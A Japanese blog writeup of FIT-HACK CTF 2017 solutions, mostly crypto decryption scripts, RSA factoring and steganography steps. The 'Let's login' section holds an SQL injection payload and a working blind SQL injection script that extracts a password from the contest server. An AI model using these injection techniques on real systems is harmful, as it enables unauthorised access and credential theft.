読者です 読者をやめる 読者になる 読者になる

FIT-HACK CTF 2017 Writeup

この大会は2017/4/8 13:00(JST)~2017/4/14 13:00(JST)に開催されました。
今回もチームで参戦。結果は4100点で514チーム中21位でした。
自分で解けた問題をWriteupとして書いておきます。

Repair (Forensic 50)

先頭を50 4B 03 04に変更し、ZIPを解凍する。
展開したPNGファイルにフラグが書かれている。
f:id:satou-y:20170424200425p:plain

FIT{r3p4ir_c0mpl3t3d_zip_d3_kur3}

Simple cipher (Crypto 100)

keyの長さを一つのブロックとして全ブロックの先頭から順番にXORしている。
次のスクリプトで復号する。

key = 'J2msBeG8'

with open('enc_mes.txt', 'r') as f:
    data = f.read()

LEN = len(data) / 2

mes = ''
for i in range(LEN / len(key)):
    for j in range(len(key)):
        index = j * (LEN / len(key)) + i
        code = int(data[index*2:index*2+2], 16)
        mes += chr(code ^ ord(key[j]))

print mes
FIT{Thi5_cryp74n4lysi5_wa5_very_5impl3}

It's_solvable (Crypto 100)

7つのRSA暗号化したデータを復号する。

$ cd 39BCC1930B969051426F5864F24B478CEAFBA7D8/
$ openssl rsa -pubin -in publicfit.pem -text -noout
Public-Key: (153 bit)
Modulus:
    01:87:ff:1f:e5:90:c8:97:83:44:d6:16:72:0c:c1:
    20:a0:ea:71:67
Exponent: 65537 (0x10001)

n = 0x0187ff1fe590c8978344d616720cc120a0ea7167
= 8741815859436417328701496607875318191936401767
= 62327402947945346311733 * 140256379152159036259499

$ rsatool.py -f PEM -o private1.pem -p 62327402947945346311733 -q 140256379152159036259499
Using (p, q) to initialise RSA instance

n =
187ff1fe590c8978344d616720cc120a0ea7167

e = 65537 (0x10001)

d =
1823e18f0bb135b6f2577444383f4f241cef379

p = 62327402947945346311733 (0xd32c679046c34d32635)

q = 140256379152159036259499 (0x1db35044c0be5eadbcab)

Saving PEM as private1.pem
$ openssl rsautl -decrypt -inkey private1.pem < mfit
vc7tJ

ほかの6つも同様。ディレクトリ名がそれぞれv1~v7のsha1の値になっており、v1~v7分をすべて復号したものを結合する(連結する文字が同じ部分は1個にする)と、フラグになる。

v1: FIT{
v2: __dOSA
v3: Ai85Z
v4: Zyapo
v5: ohvwv
v6: vc7tJ
v7: J1RuW}
FIT{__dOSAi85Zyapohvwvc7tJ1RuW}

encryption program leaked (Crypto 100)

encrypt関数の処理概要は以下の通り。

stringv = フラグをbase64暗号化
stringv と key 同じ長さになるように\x00でpadding
stringvの逆文字列とXORを取る。

これを踏まえ、スクリプトにする。

key = 'eglafdsewafslfewamfeopwamfe\x00'
encrypt = '5857342f555c2528182b55175e5f543a14540a0617394504380a0e52'

rev_b64 = ''
for i in range(0, len(encrypt), 2):
    rev_b64 += chr(int(encrypt[i:i+2], 16) ^ ord(key[i/2]))

print rev_b64[::-1].decode('base64')
FIT{b1r_n3_vwrh1_75}

bignumber (Crypto 150)

2つあるディレクトリに公開鍵と暗号データがある。

$ openssl rsa -pubin -in fer/public-key.pem -text -noout
Public-Key: (2047 bit)
Modulus:
    6c:a8:41:78:43:d5:a6:2d:d3:af:37:e0:92:68:bc:
    d6:d6:0e:50:7c:5e:07:42:7b:d8:8d:94:d8:c8:38:
    31:21:80:72:3d:2c:e9:db:0c:ab:53:3b:bd:5f:bb:
    08:de:60:01:68:bf:bc:e1:97:cc:6f:4a:da:e9:90:
    90:34:35:0b:3e:7b:eb:07:ec:07:86:57:8b:bd:4e:
    eb:1f:2f:b3:43:e1:4f:ff:4b:44:46:ba:3a:b3:5f:
    fe:0a:07:6b:9a:21:b7:3a:ab:3f:2b:2b:30:20:8d:
    3a:de:7a:c8:f4:02:7d:97:58:ae:f9:1e:bb:9d:a8:
    a5:7c:af:2a:c1:45:a6:75:8d:65:80:20:3c:97:dd:
    16:45:f3:d2:5f:6b:6a:f3:4a:e2:dd:51:ab:a6:a3:
    76:ae:28:c2:00:7c:46:00:af:26:54:21:de:28:9d:
    07:c4:e6:9a:44:5d:2a:99:aa:ef:72:bc:1c:08:29:
    8e:34:cd:49:5e:db:74:33:ec:02:49:54:35:b2:df:
    a2:3c:d4:eb:af:5c:f3:48:d2:aa:f1:45:12:f4:50:
    e9:0e:08:11:03:07:1b:07:bb:09:da:82:45:57:2f:
    30:b1:f4:55:c4:54:ce:4a:cd:68:8f:d5:99:60:54:
    9c:c0:ee:e1:bf:9f:7d:f8:23:2b:cb:01:e3:ff:a8:
    31
Exponent: 65537 (0x10001)
$ openssl rsa -pubin -in seru/public-key.pem -text -noout
Public-Key: (7470 bit)
Modulus:
    3f:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:df:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:fe:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:01
Exponent: 65537 (0x10001)

ferディレクトリにあるほうはFermat法で素因数分解できた。

n1はFermat方で素因数分解できた。
p = 117118345850371324755442721691010370746296466217613601391163655840990077599670230417096624741289813886405031113346503009135170495702881435092555492730582477110270806706808191842281165589328069923809725129015935929853235145002864445534915392828344509262317077113013662247163187898805965856003962565368895505223
q = 117118345850371324755442721691010370746296466217613601391163655840990077599670230417096624741289813886405031113346503009135170495702881435092555492730582477110270806706808191842281165589328069923809725129015935929853235145002864445534915392828344509262317077113013662247163187898805965856003962565368895505607

seruに方は2進数で1の連続の素数が要素にあると推察。次のようなコードで素因数分解できた。

n = 0x3fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001

bin_p = '1'
while True:
    bin_p += '1'
    p = int(bin_p, 2)
    if n % p == 0:
        break

q = n / p
print 'p =', str(p)
print 'q =', str(q)

結果は以下の通り。

p = 259117086013202627776246767922441530941818887553125427303974923161874019266586362086201209516800483406550695241733194177441689509238807017410377709597512042313066624082916353517952311186154862265604547691127595848775610568757931191017711408826252153849035830401185072116424747461823031471398340229288074545677907941037288235820705892351068433882986888616658650280927692080339605869308790500409503709875902119018371991620994002568935113136548829739112656797303241986517250116412703509705427773477972349821676443446668383119322540099648994051790241624056519054483690809616061625743042361721863339415852426431208737266591962061753535748892894599629195183082621860853400937932839420261866586142503251450773096274235376822938649407127700846077124211823080804139298087057504713825264571448379371125032081826126566649084251699453951887789613650248405739378594599444335231188280123660406262468609212150349937584782292237144339628858485938215738821232393687046160677362909315071
q = 190797007524439073807468042969529173669356994749940177394741882673528979787005053706368049835514900244303495954950709725762186311224148828811920216904542206960744666169364221195289538436845390250168663932838805192055137154390912666527533007309292687539092257043362517857366624699975402375462954490293259233303137330643531556539739921926201438606439020075174723029056838272505051571967594608350063404495977660656269020823960825567012344189908927956646011998057988548630107637380993519826582389781888135705408653045219655801758081251164080554609057468028203308718724654081055323215860189611391296030471108443146745671967766308925858547271507311563765171008318248647110097614890313562856541784154881743146033909602737947385055355960331855614540900081456378659068370317267696980001187750995491090350108417050917991562167972281070161305972518044872048331306383715094854938415738549894606070722584737978176686422134354526989443028353644037187375385397838259511833166416134323695660367676897722287918773420968982326089026150031515424165462111337527431154890666327374921446276833564519776797633875503548665093914556482031482248883127023777039667707976559857333357013727342079099064400455741830654320379350833236245819348824064783585692924881021978332974949906122664421376034687815350484991

ここからrsatool.pyで秘密鍵を生成する。

$ rsatool.py -f PEM -o fer/secret-key.pem -p 117118345850371324755442721691010370746296466217613601391163655840990077599670230417096624741289813886405031113346503009135170495702881435092555492730582477110270806706808191842281165589328069923809725129015935929853235145002864445534915392828344509262317077113013662247163187898805965856003962565368895505223 -q 117118345850371324755442721691010370746296466217613601391163655840990077599670230417096624741289813886405031113346503009135170495702881435092555492730582477110270806706808191842281165589328069923809725129015935929853235145002864445534915392828344509262317077113013662247163187898805965856003962565368895505607
                          :
$ rsatool.py -f PEM -o seru/secret-key.pem -p 259117086013202627776246767922441530941818887553125427303974923161874019266586362086201209516800483406550695241733194177441689509238807017410377709597512042313066624082916353517952311186154862265604547691127595848775610568757931191017711408826252153849035830401185072116424747461823031471398340229288074545677907941037288235820705892351068433882986888616658650280927692080339605869308790500409503709875902119018371991620994002568935113136548829739112656797303241986517250116412703509705427773477972349821676443446668383119322540099648994051790241624056519054483690809616061625743042361721863339415852426431208737266591962061753535748892894599629195183082621860853400937932839420261866586142503251450773096274235376822938649407127700846077124211823080804139298087057504713825264571448379371125032081826126566649084251699453951887789613650248405739378594599444335231188280123660406262468609212150349937584782292237144339628858485938215738821232393687046160677362909315071 -q 190797007524439073807468042969529173669356994749940177394741882673528979787005053706368049835514900244303495954950709725762186311224148828811920216904542206960744666169364221195289538436845390250168663932838805192055137154390912666527533007309292687539092257043362517857366624699975402375462954490293259233303137330643531556539739921926201438606439020075174723029056838272505051571967594608350063404495977660656269020823960825567012344189908927956646011998057988548630107637380993519826582389781888135705408653045219655801758081251164080554609057468028203308718724654081055323215860189611391296030471108443146745671967766308925858547271507311563765171008318248647110097614890313562856541784154881743146033909602737947385055355960331855614540900081456378659068370317267696980001187750995491090350108417050917991562167972281070161305972518044872048331306383715094854938415738549894606070722584737978176686422134354526989443028353644037187375385397838259511833166416134323695660367676897722287918773420968982326089026150031515424165462111337527431154890666327374921446276833564519776797633875503548665093914556482031482248883127023777039667707976559857333357013727342079099064400455741830654320379350833236245819348824064783585692924881021978332974949906122664421376034687815350484991
                          :

復号してみる。

$ openssl rsautl -decrypt -inkey fer/secret-key.pem < fer/message
5c070e581f1e4a152e040e274b724720445c31312e3e102b05067c5738200d07
$ openssl rsautl -decrypt -inkey seru/secret-key.pem < seru/message
65417439774c784d56415a44784b76423265775257736a7369374e326d4c6655

XORしたものはBase64文字列っぽいがそのままではデコードできない。結果は文字列を逆順にしたものをデコードすればよい。

e1 = '5c070e581f1e4a152e040e274b724720445c31312e3e102b05067c5738200d07'
e2 = '65417439774c784d56415a44784b76423265775257736a7369374e326d4c6655'

code = int(e1, 16) ^ int(e2, 16)
print ('%x' % code).decode('hex')[::-1].decode('base64')
FIT{me_32p_oo_wq11_dak1}

service encrypt (Crypto 200)

$ nc walked.problem.ctf.nw.fit.ac.jp 4000
a
5756453950513d3d
b
5757633950513d3d
c
5758633950513d3d
z
5a57633950513d3d
aa
5756453950513d3d5857463a51523e3e
aaa
5756453950513d3d5857463a51523e3e5958473b52533f3f

16進数表記16文字がブロック単位で以下で復号できそう。
HEXデコード→Base64デコード→Base64デコード
さらに1ブロック単位でシフトが増えていくことを考慮して復号する。

with open('info.txt', 'r') as f:
    data = f.read().strip()

count = 0
flag = ''
for i in range(0, len(data), 16):
    enc = data[i:i+16]
    b64 = ''
    for j in range(0, 16, 2):
        b64 += chr(int(enc[j:j+2], 16) - count)
    flag += b64.decode('base64').decode('base64')
    count += 1

print flag
FIT{uq_4e_fdswal_32p}

Get (Web 50)

No.179のパケットでBasic認証のID/PWを見る。
fithack:FIT{332dref3a5g7h}

FIT{332dref3a5g7h}

Look quickly (Web 50)

レスポンスヘッダのset-cookieに以下がセットされている。
flag=FIT%7BI7_i5_n07_4_c00ki3_t0_3a7%7D

FIT{I7_i5_n07_4_c00ki3_t0_3a7}

100 Count (Web 100)

Cookieのcountを99にして、正解するとフラグが表示された。

FIT{fsaewiwe}

Let's login (Web 150)

IDに "' or 1=1 --" と入れてみると、以下の表示。

Password is a flag

Table name: user

Column name: name, pass

ブラインドSQLインジェクションを試してみる。

import urllib
import urllib2
passwordlist = []

for i in range(1,50):
    req = {'name':"' or (select length(pass) from user) = " + str(i) + " --", 'pass':''}
    params = urllib.urlencode(req)
    url = 'https://login.problem.ctf.nw.fit.ac.jp/login.php'
    request = urllib2.Request(url, params)
    response = urllib2.urlopen(request)
    data = response.read()
    if 'flag' in data:
        print "The password has " + str(i) + " characters"
        passlen = i
        break

for j in range(1,passlen + 1):
    for x in range(32,127):
        req = {'name':"' or substr((SELECT pass FROM user)," + str(j) + ",1)='" + chr(x) + "'--", 'pass':''}
        params = urllib.urlencode(req)
        url = 'https://login.problem.ctf.nw.fit.ac.jp/login.php'
        request = urllib2.Request(url, params)
        response = urllib2.urlopen(request)
        data = response.read()
        if 'flag' in data:
            print chr(x),
            passwordlist.append(chr(x))
            break
        
password = "".join(passwordlist)
print ""
print "The password is " + password

この結果は以下の通り。

The password has 21 characters
F I T { 9 n 8 9 _ y 0 u 3 u _ 9 a 8 1 1 }
The password is FIT{9n89_y0u3u_9a811}
FIT{9n89_y0u3u_9a811}

Specific (Recon 100)

EXIF情報を見る。

ファイル名: photo.jpg [1/1]
画像サイズ: 3.3MB
更新日時: 2017/04/08 20:34:27
画像情報: 3840x2160 (Jpeg,YUV,sRGB)

メーカー: Sony
カメラ: SOV33
ソフトウェア: 39.2.C.0.203_0_f700
撮影日時: 2017/02/19 09:50:28
フラッシュ使用: No
焦点距離: 4.23mm
シャッター速度: 0.000500s  (1/2000)
絞り: f/2.0
ISO感度: 40
測光方式: Pattern
GPS情報: N 31°49'25.90", E 130°18'52.86" 

Googleマップで「31°49'25.90"N 130°18'52.86"E 」を調べ、その周辺から橋の名前を調べる。
「天大橋」(てんたいばし)ということがわかった。

FIT{tentaibashi}

Dissonance (Steganography 50)

$ file dissonance.wav 
dissonance.wav: Standard MIDI data (format 1) using 18 tracks at 1/480

拡張子をmidに変更し、Music Studiop Producerで開き、ピアノロールを見る。
f:id:satou-y:20170424203556p:plain

FIT{Jwbx4CtiL8Et}

MP3Stego (Steganography 100)

mp3ファイルのプロパティを見ると、コメントに「The pass is dialup」と書いてある。タイトルにある通り、MP3Stegoを使い、このパスワードでデコードする。

>decode -X -P dialup connection.mp3
MP3StegoEncoder 1.1.17
See README file for copyright info
Input file = 'connection.mp3'  output file = 'connection.mp3.pcm'
Will attempt to extract hidden information. Output: connection.mp3.txt
the bit stream file connection.mp3 is a BINARY file
HDR: s=FFF, id=1, l=3, ep=off, br=9, sf=0, pd=1, pr=0, m=3, js=0, c=0, o=0, e=0
alg.=MPEG-1, layer=III, tot bitrate=128, sfrq=44.1
mode=single-ch, sblim=32, jsbd=32, ch=1
[Frame 1056]Avg slots/frame = 421.481; b/smp = 2.93; br = 129.079 kbps
Decoding of "connection.mp3" is finished
The decoded PCM output file name is "connection.mp3.pcm"

connection.mp3.txtが出力され、フラグが書かれている。

FIT{PeePeeHyoroRorro}

trivia1 (Trivia 10)

「任意のコードがリモートで実行されるbashで見つかったバグは?」という問題。

FIT{SHELLSHOCK}

trivia2 (Trivia 10)

SSLのバージョン3.0に存在するドッグ・ブリードは?」という問題。

FIT{POODLE}

trivia3 (Trivia 10)

「VyOS 1.0.0 - 1.0.5」とだけ書かれた問題・

FIT{HYDROGEN}

trivia4 (Trivia 10)

「音声圧縮を行う音声符号化規格でMP3の後継フォーマットは?」という問題。

FIT{AAC}

trivia5 (Trivia 10)

GoogleとCWIによってなされたSHA-1コリジョン攻撃のニックネームは?」という問題。

FIT{SHATTERED}